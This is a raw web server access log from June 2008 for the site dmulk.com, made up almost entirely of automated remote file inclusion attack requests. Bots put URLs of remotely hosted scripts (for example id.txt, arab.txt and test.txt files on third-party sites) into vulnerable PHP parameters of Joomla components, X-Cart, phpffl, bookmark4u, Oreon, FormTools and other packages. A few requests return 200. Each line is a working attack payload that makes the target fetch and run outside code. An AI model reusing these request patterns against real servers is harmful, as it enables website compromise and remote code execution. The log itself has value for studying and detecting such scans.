211.239.161.10 - - [17/Jun/2008:11:07:42 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:07:46 -0700] "GET /logs/access.log//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:07:46 -0700] "GET //components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:07:46 -0700] "GET /logs//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:07:50 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:08:08 -0700] "GET /logs/access.log//components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:08:08 -0700] "GET //components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:08:08 -0700] "GET /logs//components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:08:19 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:08:19 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:08:20 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:08:27 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:08:28 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:44 -0700] "GET /logs/access.log//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:45 -0700] "GET //components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:45 -0700] "GET /logs//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:50 -0700] "GET /logs/access.log//components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:50 -0700] "GET //components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:50 -0700] "GET /logs//components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:53 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:54 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:54 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:56 -0700] "GET /logs/access.log//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:56 -0700] "GET //components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:56 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:56 -0700] "GET /logs//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:56 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:08:57 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:09:06 -0700] "GET /logs/access.log//components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:09:06 -0700] "GET //components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:09:07 -0700] "GET /logs//components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.255.107 - - [17/Jun/2008:11:09:10 -0700] "GET /logs/access_071219.log//errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:09:17 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:09:17 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:09:17 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:09:17 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:11:09:18 -0700] "GET /logs//index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:11:09:18 -0700] "GET //index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:09:24 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:09:25 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:09:31 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:09:31 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:09:31 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:09:43 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:09:43 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:09:48 -0700] "GET /logs/access_080228.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:09:49 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:09:50 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:10:08 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:10:08 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:10:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:10:09 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:10:10 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:11:10:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:10:20 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.245.203 - - [17/Jun/2008:11:10:37 -0700] "GET /logs/access_071219.log//errors.php?error=http://220.130.55.207/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:10:44 -0700] "GET /logs/access_071226.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:10:44 -0700] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:10:45 -0700] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:11:11:28 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:11:11:28 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:11:11:32 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:11:59 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:00 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:07 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:09 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:14 -0700] "GET /logs/access_080312.log//?pag=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:22 -0700] "GET //?pag=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 18385 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:25 -0700] "GET /logs//?pag=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 52280 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:31 -0700] "GET /logs/access_080312.log//?pg=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:33 -0700] "GET //?pg=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 18383 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:35 -0700] "GET /logs//?pg=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 52280 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:12:47 -0700] "GET /logs/access_080312.log//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [17/Jun/2008:11:12:48 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [17/Jun/2008:11:12:50 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:51 -0700] "GET /logs/access_080312.log//?page=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:12:56 -0700] "GET //?page=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 18387 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:13:04 -0700] "GET /logs//?page=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 52280 "-" "libwww-perl/5.812" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:13:07 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:13:07 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:13:07 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:11:13:10 -0700] "GET /logs/access_080312.log//components/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:13:12 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:13:14 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:11:13:16 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.130.190.234 - - [17/Jun/2008:11:13:27 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback HTTP/1.1" 200 6911 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:14:12 -0700] "GET /logs/access_080312.log//?p=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:14:14 -0700] "GET //?p=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 18381 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:14:30 -0700] "GET /logs//?p=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 200 52280 "-" "libwww-perl/5.812" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:14:36 -0700] "GET /logs/access.log//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:14:37 -0700] "GET //components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:11:14:37 -0700] "GET /logs//components/errors.php?error=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:14:46 -0700] "GET /logs/access.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:14:50 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:14:51 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:11:15:26 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:15:44 -0700] "GET /logs//errors.php?error=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:15:44 -0700] "GET //errors.php?error=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:15:45 -0700] "GET /logs/prepare.php?xcart_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:15:45 -0700] "GET /prepare.php?xcart_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:01 -0700] "GET /logs/access_080215.log//account.php?action=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:02 -0700] "GET //account.php?action=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:03 -0700] "GET /logs//account.php?action=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:08 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:17:42 -0700] "GET /config.php?xcart_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:17:49 -0700] "GET /logs/config.php?xcart_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:54 -0700] "GET /logs/access_080119.log//account.php?action=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:55 -0700] "GET //account.php?action=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:56 -0700] "GET /logs//account.php?action=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:17:56 -0700] "GET /logs/access_080211.log//account.php?action=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:18:05 -0700] "GET /modules/addons/plugin.php?doc_root=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:18:06 -0700] "GET /logs/access_080216.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:11:18:25 -0700] "GET /logs/index.php?pagina=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:11:18:25 -0700] "GET /logs/access_080201.log/index.php?pagina=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.251.172 - - [17/Jun/2008:11:18:26 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:11:18:29 -0700] "GET /index.php?pagina=http://skill-station.net/help/id5.txt??? HTTP/1.1" 200 18411 "-" "libwww-perl/5.810" "www.dmulk.com"
